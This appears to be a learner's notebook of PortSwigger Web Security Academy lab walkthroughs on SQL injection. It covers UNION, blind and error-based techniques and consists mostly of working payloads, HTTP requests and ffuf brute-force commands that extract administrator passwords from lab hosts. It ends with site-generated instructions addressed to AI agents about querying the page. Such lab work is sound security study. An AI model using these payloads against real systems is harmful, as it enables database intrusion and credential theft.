# SQL Injection * What SQL injection (SQLi) is. * How to find and exploit different types of SQLi vulnerabilities. * How to prevent SQLi. **SQLi** is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. *** #### Ideas `Field of ideas taken in this vulnerability topic.` Take the character code (charcode) sort example: (1, 1) > 'm' and do this automation. Bugbounty: Create a automation that writes the FUZZ2 output in alphabetical order of FUZZ1
*** `SELECT * FROM products WHERE category = 'Gifts' AND released = 1` \ url: `https://0ab7007a0308a5e1825b16a7004100b0.web-security-academy.net/filter?category=Accessories` Accessories'OR+1=1--\
*** ### Lab: Lab: SQL injection vulnerability allowing login bypass \ \ ID: administrator\ password: ' OR 1=1-- *** ### SQL injection UNION attacks ### Examining the database in SQL injection attacks To exploit SQL injection vulnerabilities, it's often necessary to find information about the database. This includes: The type and version of the database software.\ The tables and columns that the database contains. ### Lab: SQL injection attack, querying the database type and version on Oracle Analysis: **(1) Determine the number of columns** ' order by 3-- => internal server error 3 - 1 = 2 **(2) Determine the data types of the columns** SELECT \* FROM V$VERSION -> error ' UNION SELECT 'a', 'a'-- => oracle db Internal Server Error 'UNION SELECT \* FROM v$version-- -> 500 Internal Server Error\ 'UNION%20SELECT%20\*%20FROM%20v%24version-- 'UNION SELECT \* FROM v$version-- 'UNION SELECT version, NULL FROM v$instance-- -> 500 Internal Server Error **SQLi Query on Oracle db:** `'UNION SELECT banner, NULL FROM v$version--`\ `'UNION%20SELECT%20banner%2c%20NULL%20FROM%20v%24version--`\
*** ### Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft \ errors: ``` 'UNION+SELECT+@@version ``` ``` 'UNION+SELECT+@@version ``` ``` 'OR+1=1-- 'UNION+SELECT+@@version 'SELECT+@@version 'order+by+1# -> all errors in browser ``` ``` 'OR+1=1-- 'UNION+SELECT+@@version 'SELECT+@@version 'order+by+1# -> all errors in browser ``` with burpsuit:
**Analysis 'category' parameter:** (1) Determine the number of columns:\ ' order by 3-- => internal server error\ \= 2 columns. ``` GET /filter?category=Clothing%2c+shoes+and+accessories'order+by+3# HTTP/2 ``` ``` GET /filter?category=Clothing%2c+shoes+and+accessories'order+by+3# HTTP/2 ``` (2) Determine the db type+version of the columns (MySQL and Microsoft): ``` query: 'UNION SELECT @@version,NULL# GET /filter?category=Clothing%2c+shoes+and+accessories'UNION%20SELECT%20%40%40version%2cNULL%23 ``` ``` query: 'UNION SELECT @@version,NULL# GET /filter?category=Clothing%2c+shoes+and+accessories'UNION%20SELECT%20%40%40version%2cNULL%23 ``` \ `Browser Response:`\ \ \ `Burpsuit Response:` ``` Without Query: ``` ``` Without Query: ``` ``` With SQLi Query: ``` ``` With SQLi Query: ``` **Requests made via url in the browser like "'order+by+1#" did not work, but in burp they would work.** *** ### Lab: SQL injection attack, listing the database contents on non-Oracle databases **End goals:** * Determine a table that holds usernames and passwords * Determine columns * Output content table * Login with 'administrator' user **Analysis:** (1) Find numbers of columns\ ' -> Internal Server Error\ \# -> ok\ ' order by 1--\ 2 columns (2) Find db type\ ' UNION SELECT version(),NULL--\ '+UNION+SELECT+version(),NULL--
db= PostgreSQL\ `PostgreSQL 12.16 (Ubuntu 12.16-0ubuntu0.20.04.1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0, 64-bit` (3) Listing contents in db table\ Postgree db have `information_schema.tables`\ Most database types (- Oracle) have set points.\ Example:
`' UNION SELECT table_name,null FROM information_schema.tables--` (4) Find username+password from administrator `' UNION SELECT table_name,null FROM information_schema.tables--` `' UNION SELECT column_name,null FROM information_schema.columns WHERE table_name='pg_user'--` `' UNION SELECT column_name,null FROM information_schema.columns WHERE table_name='tables'--` `' UNION SELECT column_name,null FROM information_schema.columns WHERE table_name='users_mcwdbl'--`\ \ `' UNION SELECT username_knetyj, null FROM users_mcwdbl--`
``` wiener administrator carlos ``` ``` wiener administrator carlos ``` `' UNION SELECT password_gbqglo, null FROM users_mcwdbl--`
``` alht4jjlilpjo0mms3fw -> administrator mgy86mxw90djyfz4wimj ir4subxbcc63bk19o2uq ``` ``` alht4jjlilpjo0mms3fw -> administrator mgy86mxw90djyfz4wimj ir4subxbcc63bk19o2uq ``` ``` user: administrator password: alht4jjlilpjo0mms3fw ``` ``` user: administrator password: alht4jjlilpjo0mms3fw ```
errors or tentativas:\ ' UNION SELECT \* FROM information\_schema.tables-- -> 500 Internal Server Error '+UNION+SELECT+NULL+AS+column1,+table\_name+AS+column2+FROM+information\_schema.tables-- ' UNION SELECT pg\_user,null FROM information\_schema.tables-- ' UNION SELECT pg\_user,null FROM information\_schema.tables.table\_name--\ ' UNION SELECT table\_name,null FROM information\_schema.columns WHERE table\_name = ' pg\_user'--\ '%20UNION%20SELECT%20table\_name%2cnull%20FROM%20information\_schema.columns%20WHERE%20table\_name%20%3d%20'pg\_user'-- 'SELECT+UNION+column\_name+FROM+information\_schema.columns+WHERE+table\_name%3d'pg\_user'--\ '+UNION+SELECT+column\_name+FROM+information\_schema.columns+WHERE+table\_name%3d'pg\_user'-- ' UNION SELECT column\_name,null FROM information\_schema.columns WHERE table\_name='pg\_user'-- ' UNION SELECT column\_name,null FROM information\_schema.columns WHERE table\_name='pg\_user'-- *** ### Lab: SQL injection attack, listing the database contents on Oracle **End goal:** The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users. **Analysis:** (1) Number columns ``` 'order by 1-- 'order by 2-- 'order by 3-- -> Internal Server Error ``` ``` 'order by 1-- 'order by 2-- 'order by 3-- -> Internal Server Error ``` Number Columns= 2 (2) Db type= oracle, test the Oracle type query ``` 'UNION SELECT banner, NULL FROM v$version-- ``` ``` 'UNION SELECT banner, NULL FROM v$version-- ``` \ Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production (3) List the tables name ``` 'UNION SELECT table_name, NULL from all_tables-- ``` ``` 'UNION SELECT table_name, NULL from all_tables-- ``` \ \ Find: USERS\_UWXAOL (4) List the columns in the 'USERS\_UWXAOL' table ``` 'UNION SELECT column_name, null FROM all_tab_columns WHERE table_name = 'USERS_UWXAOL'-- - ``` ``` 'UNION SELECT column_name, null FROM all_tab_columns WHERE table_name = 'USERS_UWXAOL'-- - ``` \ Column: USERNAME\_CXPDBW\ Column: PASSWORD\_PKHNMW (5) List contents in columns ``` 'UNION SELECT USERNAME_CXPDBW, PASSWORD_PKHNMW FROM USERS_UWXAOL-- - ``` ``` 'UNION SELECT USERNAME_CXPDBW, PASSWORD_PKHNMW FROM USERS_UWXAOL-- - ``` \ user: administrator\ password: ue2n77amwhlqk9vitulu\
*** ### Lab: SQL injection UNION attack, determining the number of columns returned by the query **End goal:** To solve the lab, determine the number of columns returned by the query by performing a SQL injection UNION attack that returns an additional row containing null values. **Analysis:** (1) Find column number ``` 'order by 1-- - 'order by 2-- - 'order by 3-- - 'order by 4-- - -> Internal Server Error ``` ``` 'order by 1-- - 'order by 2-- - 'order by 3-- - 'order by 4-- - -> Internal Server Error ``` ``` 'UNION SELECT NULL,-- - 'UNION SELECT NULL,NULL-- - 'UNION SELECT NULL,NULL,NULL-- - 'UNION SELECT NULL,NULL,NULL,NULL-- - -> Internal Server Error ``` ``` 'UNION SELECT NULL,-- - 'UNION SELECT NULL,NULL-- - 'UNION SELECT NULL,NULL,NULL-- - 'UNION SELECT NULL,NULL,NULL,NULL-- - -> Internal Server Error ``` Column number= 3. In browser like:\ `'order by 1-- -`\ \ \ \ `'UNION SELECT NULL,-- -`\ \ \ 🌹\
*** ### Lab: SQL injection UNION attack, finding a column containing text **End Goal:** The lab will provide a random value that you need to make appear within the query results. To solve the lab, perform a SQL injection UNION attack that returns an additional row containing the value provided. This technique helps you determine which columns are compatible with string data. **Analysis:** (1) Find Column number ``` 'UNION SELECT NULL-- - 'UNION SELECT NULL,NULL-- - 'UNION SELECT NULL,NULL,NULL-- - 'UNION SELECT NULL,NULL,NULL,NULL-- - -> Internal Server Error ``` ``` 'UNION SELECT NULL-- - 'UNION SELECT NULL,NULL-- - 'UNION SELECT NULL,NULL,NULL-- - 'UNION SELECT NULL,NULL,NULL,NULL-- - -> Internal Server Error ``` ``` 'UNION SELECT 'a',NULL,NULL-- - -> Internal Server Error 'UNION SELECT NULL,'a',NULL-- - 'UNION SELECT NULL,NULL,'a'-- - -> Internal Server Error ``` ``` 'UNION SELECT 'a',NULL,NULL-- - -> Internal Server Error 'UNION SELECT NULL,'a',NULL-- - 'UNION SELECT NULL,NULL,'a'-- - -> Internal Server Error ``` `'UNION SELECT NULL,'qm4JyW',NULL-- -`\ \
*** ### Lab: SQL injection UNION attack, retrieving data from other tables **End goals:** The database contains a different table called users, with columns called username and password. To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user. **Infos:** **Table** = 'users';\ **Column** = 'username', 'password' **Analysis:** (1) Column number\ Column number = 2 (2) Db query consulte ``` 'UNION SELECT username,password FROM users-- - ``` ``` 'UNION SELECT username,password FROM users-- - ``` \ username: administrator\ password: 8qcc99qn9jiic9zx376k\
*** ### Lab: SQL injection UNION attack, retrieving multiple values in a single column **End Goals:** The database contains a different table called users, with columns called username and password. To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user. **Infos:** **Table** = 'users';\ **Column** = 'username', 'password' **Analysis:** (1) Column number ``` 'UNION SELECT null,null-- - ``` ``` 'UNION SELECT null,null-- - ``` \ Column number = 2 (2) Verify useful datatype ``` 'UNION SELECT null,null-- - -> Internal Server Error 'UNION SELECT null,'a'-- - ``` ``` 'UNION SELECT null,null-- - -> Internal Server Error 'UNION SELECT null,'a'-- - ``` (3) Use '|| ||'' for multiple values in a single column ``` 'UNION SELECT NULL,'username'|| ' ~ ' || password FROM users-- - ``` ``` 'UNION SELECT NULL,'username'|| ' ~ ' || password FROM users-- - ``` \
*** ### Blind SQL injection ### What is blind SQL injection? Techniques such as UNION attacks are not effective with blind SQL injection vulnerabilities. It is because they rely on being able to **see** the results of the injected query within the application's responses. **Possible** to exploit blind SQL injection to access unauthorized data. ### Exploiting blind SQL injection by triggering conditional responses Application uses tracking cookies to gather analytics about usage. **Request:** `Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4` ``` Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4 ``` ``` Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4 ``` Parameter 'TrackingId' is processed **Query:** ``` SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4' ``` ``` SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4' ``` submit a recognized 'TrackingId' query returns data and you receive a "Welcome back" message in the response. To understand 'TrackingId' ``` …xyz' AND '1'='1 -> "Welcome back" message is displayed …xyz' AND '1'='2 -> message is not displayed ``` ``` …xyz' AND '1'='1 -> "Welcome back" message is displayed …xyz' AND '1'='2 -> message is not displayed ``` ### Exploiting blind SQL injection by triggering conditional responses - Continued **Example:** **Infos:** **Table:** 'Users';\ **Columns:** 'Username', 'Password';\ **User:** 'Administrator';\ Can determine 'password' for user sending inputs to test the password one character at a time. **Input:** ``` xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'administrator'), 1, 1) > 'm ``` ``` xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'administrator'), 1, 1) > 'm ``` If returns the "Welcome back" message indicate that first character password is > than m. If **not**, first character password is **not** > than m. **Then:** ``` xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) = 's ``` ``` xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) = 's ``` Can continue this process to systematically. **Note:** 'SUBSTRING' function can called 'SUBSTR' anothers db's. *** ### Lab: Blind SQL injection with conditional responses **End goals:** This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie. The results of the SQL query are not returned, and no error messages are displayed. But the application includes a "Welcome back" message in the page if the query returns any rows. The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user. To solve the lab, log in as the administrator user. **Infos:** **Table:** 'Users';\ **Columns:** 'username ', 'password';\ **User:** 'administrator '; **Analysis:** (1) Find the tracking cookie\ \ TrackingId = SbFU4ujbGj9HwD58 (2) Confirm that exist a **users table** and **username 'administrator'** ``` 'AND (SELECT 'x' FROM users LIMIT 1)='x' AND (SELECT username FROM users WHERE username = 'administrator')='administrator'-- - ``` ``` 'AND (SELECT 'x' FROM users LIMIT 1)='x' AND (SELECT username FROM users WHERE username = 'administrator')='administrator'-- - ``` (3) Find the first caracter north for password ``` 'AND SUBSTRING((SELECT Password FROM Users WHERE Username='administrator'),1,1)>'m'-- - ``` ``` 'AND SUBSTRING((SELECT Password FROM Users WHERE Username='administrator'),1,1)>'m'-- - ``` \ First caracter > 'm' (4) Continuos test ``` 'AND SUBSTRING((SELECT Password FROM Users WHERE Username='administrator'),1,1)='w'-- - ``` ``` 'AND SUBSTRING((SELECT Password FROM Users WHERE Username='administrator'),1,1)='w'-- - ``` \ First caracter password = 'w' (5) Secound caracter password ``` 'AND SUBSTRING((SELECT Password FROM Users WHERE Username='administrator'),2,1)='h'-- - ``` ``` 'AND SUBSTRING((SELECT Password FROM Users WHERE Username='administrator'),2,1)='h'-- - ``` \ Secound caracter password = 'h' (6) Find Password Lenght ``` 'AND SUBSTRING((SELECT password FROM users WHERE username='administrator'), §1§,1) > '0'-- - ``` ``` 'AND SUBSTRING((SELECT password FROM users WHERE username='administrator'), §1§,1) > '0'-- - ```
(7) Password with Burpsuit 'Intruder'\ \ 1 2\ 2 6\ 3 i\ 4 t\ 5 e\ 6 f\ 7 h\ 8 p\ 9 j\ 10 f\ 11 n\ 12 o\ 13 9\ 14 5\ 15 k\ 16 8\ 17 z\ 18 h\ 19 9\ 20 p Password = '26itefhpjfno95k8zh9p' (7) Find password with 'ffuf' ``` ffuf -u https://0ae000a604bed72d8088302a006a009f.web-security-academy.net/ -w ./LabSQLiListParameter1.txt:FUZZ1 -w ./LabSQLiListParameter2.txt:FUZZ2 -b "TrackingId=BsRLGSgdlnyuSjOA'AND SUBSTRING((SELECT password FROM users WHERE username='administrator'), FUZZ1, 1) = 'FUZZ2'-- -" -c ``` ``` ffuf -u https://0ae000a604bed72d8088302a006a009f.web-security-academy.net/ -w ./LabSQLiListParameter1.txt:FUZZ1 -w ./LabSQLiListParameter2.txt:FUZZ2 -b "TrackingId=BsRLGSgdlnyuSjOA'AND SUBSTRING((SELECT password FROM users WHERE username='administrator'), FUZZ1, 1) = 'FUZZ2'-- -" -c ``` **Errors:** 'AND SUBSTRING((SELECT Password FROM Users WHERE Username ='Administrator'),1,1)>'m-- - ' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'm 'AND SUBSTRING((SELECT password FROM Users WHERE table\_name='Administrator'),1,1)>'b-- -\
*** ### Error-based SQL injection Cases where you're able to use error messages to either extract or infer sensitive data from the database. * Can induce the application to return a specific error response based on the result of a boolean expression. * Can trigger error messages that output the data returned by the query, turns blind SQL injection in visible. ### Exploiting blind SQL injection by triggering conditional errors Some applications carry out SQL queries but their behavior doesn't change, regardless of whether the query returns any data.The **technique won't work** because injecting different boolean conditions makes no difference to the application's responses. ``` xyz' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a xyz' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a ``` ``` xyz' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a xyz' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a ``` * First part of CASE available ELSE, 1 = 2, THEN makes 'a'='a': does not cause an error. * Seccound CASE available THEN, 1 = 1, THEN makes '1/0' divide-by-zero error. ### Lab: Blind SQL injection with conditional errors #### End Goals: Discover the db **Infos:** **table:** users;\ **columns:** 'username', 'password'\ **user:** administrator **Analysis** (1) Test SQLi Query and discover db ``` ' -> 500 Internal Server Error '' '|| (select '') ||' -> 500 Internal Server Error (not is postgreDB) '||(select '' FROM dual)||' -> oracle db ``` ``` ' -> 500 Internal Server Error '' '|| (select '') ||' -> 500 Internal Server Error (not is postgreDB) '||(select '' FROM dual)||' -> oracle db ```
(2) Confirm existing 'users' table in db ``` '||(SELECT '' FROM users)||' -> 500 Internal Server Error '||(SELECT '' FROM users WHERE rownum=1)||' ``` ``` '||(SELECT '' FROM users)||' -> 500 Internal Server Error '||(SELECT '' FROM users WHERE rownum=1)||' ``` \ exist 'users' table (3) Confirm 'administrator' username exist ``` '||(SELECT username FROM users WHERE username='administrator')||' '||(select '' from users where username='administrator')||'' [best] ``` ``` '||(SELECT username FROM users WHERE username='administrator')||' '||(select '' from users where username='administrator')||'' [best] ``` (4) Test if parameter vulnerable ``` '||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END username FROM users WHERE username='administrator') ||' -> 500 Internal Server Error '||(SELECT CASE WHEN (1=0) THEN TO_CHAR(1/0) ELSE '' END from users WHERE username='administrator')||' -> 200 OK ``` ``` '||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END username FROM users WHERE username='administrator') ||' -> 500 Internal Server Error '||(SELECT CASE WHEN (1=0) THEN TO_CHAR(1/0) ELSE '' END from users WHERE username='administrator')||' -> 200 OK ``` `Response -> 500 Internal Server Error = administrator user exist`
`Reponse -> 200 OK = does not exist "username='NOT EXISTadministrator'"`
(5) Find password length ``` '|| (SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END username FROM users WHERE username='administrator' AND LENGTH(password)>15)||' ``` ``` '|| (SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END username FROM users WHERE username='administrator' AND LENGTH(password)>15)||' ``` `Response -> 500 Internal Server Error then password>15`
`Response -> 200 OK Internal Server Error`\ \ `Response -> 500 Internal Server Error then (password=20)`
(6) Discover password first caracter ``` '|| (SELECT CASE WHEN (1=1) then TO_CHAR(1/0) ELSE '' END FROM dual WHERE username='administrator AND SUBSTR(password)>0') ||' ``` ``` '|| (SELECT CASE WHEN (1=1) then TO_CHAR(1/0) ELSE '' END FROM dual WHERE username='administrator AND SUBSTR(password)>0') ||' ``` `Response -> 500 Internal Server Error then password>4`\ \ `Response -> 200 OK then password NOT is > 5, password=5.`\ \ `Response -> Error == password=5`
(7) Find the password with 'comparer' ``` '|| (SELECT case WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END username FROM users WHERE username='administrator' AND SUBSTR(password,§1§,1)='§5§')||' ``` ``` '|| (SELECT case WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END username FROM users WHERE username='administrator' AND SUBSTR(password,§1§,1)='§5§')||' ``` (8) Find the password with 'ffuf' ``` ffuf -u https://0aaf00e303945b7f802d03f1007c00ae.web-security-academy.net/ -w ./Numbers1-20Wordlist.txt:FUZZ1 -w ./AsciiPasswordWordlist.txt:FUZZ2 -b "TrackingId=yWhlx83xuq5dNO6d'|| (SELECT case WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END username FROM users WHERE username='administrator' AND SUBSTR(password,FUZZ1,1)='FUZZ2')||'" -mc 500 -t 200 -c ``` ``` ffuf -u https://0aaf00e303945b7f802d03f1007c00ae.web-security-academy.net/ -w ./Numbers1-20Wordlist.txt:FUZZ1 -w ./AsciiPasswordWordlist.txt:FUZZ2 -b "TrackingId=yWhlx83xuq5dNO6d'|| (SELECT case WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END username FROM users WHERE username='administrator' AND SUBSTR(password,FUZZ1,1)='FUZZ2')||'" -mc 500 -t 200 -c ``` \[Status: 200, Size: 11439, Words: 5275, Lines: 287, Duration: 283ms]\ \* FUZZ1: 20\ \* FUZZ2: 2\ \ Only true password matchs \[Status: 500, Size: 2226, Words: 886, Lines: 46, Duration: 253ms] \* FUZZ1: 9\ \* FUZZ2: 0 `Then:`\ 1 t\ 2 l\ 3 3\ 4 7\ 5 6\ 6 n\ 7 4\ 8 9\ 9 0\ 10 l\ 11 u\ 12 y\ 13 o\ 14 g\ 15 c\ 16 i\ 17 4\ 18 x\ 19 2\ 20 z\ password= 'tl376n490luyogci4x2z'\
Errors:\ 'AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a\ 'AND (SELECT CASE WHEN (1=1) THEN 1/1 ELSE 'a' END)='a'--\ 'AND (SELECT CASE WHEN (1=1) THEN 1/1 ELSE 'a' END)='a'-- ' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a\ ' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a Oracle SELECT CASE WHEN (1=1) THEN TO\_CHAR(1/0) ELSE NULL END FROM dual\ Microsoft SELECT CASE WHEN ((1=1) THEN 1/0 ELSE NULL END\ (SELECT CASE WHEN ((1=1) THEN 1/0 ELSE 'a' END)='a'\ PostgreSQL 1 = (SELECT CASE WHEN ((1=1) THEN 1/(SELECT 0) ELSE NULL END)\ MySQL SELECT IF((1=1,(SELECT table\_name FROM information\_schema.tables),'a') (select 1 and row(1,1)>(select count(\*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))*\ \&#xNAN;*'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()\*2))x from (select 1 union select 2)a group by x limit 1))+' 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20\ t l 3 6 6 n 4 9 0 l u y o g x i 4 x 2 z\ tl366n490luyogxi4x2z\ tl376n490luyogci4x2z --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://public-8.gitbook.io/rapha/ctfs/portswigger/vulnerabilities/sql-injection.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.